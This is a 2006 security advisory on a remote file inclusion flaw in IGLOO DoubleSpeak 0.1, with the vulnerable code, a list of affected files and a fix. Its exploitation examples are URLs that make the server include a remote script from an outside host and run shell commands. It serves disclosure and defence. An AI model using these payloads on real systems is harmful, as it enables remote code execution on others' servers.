igloo DoubleSpeak v 0.1 Multiple remote file inclusion ----------------------------------------------------- Aria-security.com advisory Bug Discovered by R@1D3N (amin emami) Original Advisory:http://www.aria-security.net/advisory/igloo/doublespeak.txt email:AminRayden@xxxxxxxxx Date:12/06/2006 ----------------------------------------------------- Affected software description: IGLOO DoubleSpeak <= 0.1 Vendor:http://sourceforge.net/projects/iglooweb/ Vulnerability:Multiple remote file inclusion ----------------------------------------------------- Summary: DoubleSpeak, formerly known as the Igloo Weblog, aims to be the easiest to use and most customizable CMS (content management system) on the Internet. ----------------------------------------------------- Vulnerable code: require "config.inc"; require "$config[private]/local.inc"; ----------------------------------------------------- Proof of concept: The problem exists is in the below files when used the variable $config[private] in a require() function without being Declared index.php faq.php hardware.php ianal.php links.php login.php logout.php new_stories.php old.php poll.php rtfm.php software.php TODO.php /admin/add_links.php /admin/add_story.php /admin/add_poll.php /admin/index.php /admin/view_story_queue.php /ui/create_acct.php /ui/submit_story.php /ui/suggest_poll.php /ui/suggest_topic.php /ui/vote_on_polls.php ----------------------------------------------------- Exploitation example: http://www.r0x3d.com/[igloo_Path]/html/index.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a http://www.r0x3d.com/[igloo_Path]/html/faq.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a http://www.r0x3d.com/[igloo_Path]/html/hardware.php?config[private]=http://www.Site.com/x.txt?&cmd=uname -a ... ----------------------------------------------------- Fix: turn off register_globals and add this code before vulnerable code $config[private] = "./"; =========================== Aria Security Research Http://www.aria-security.net
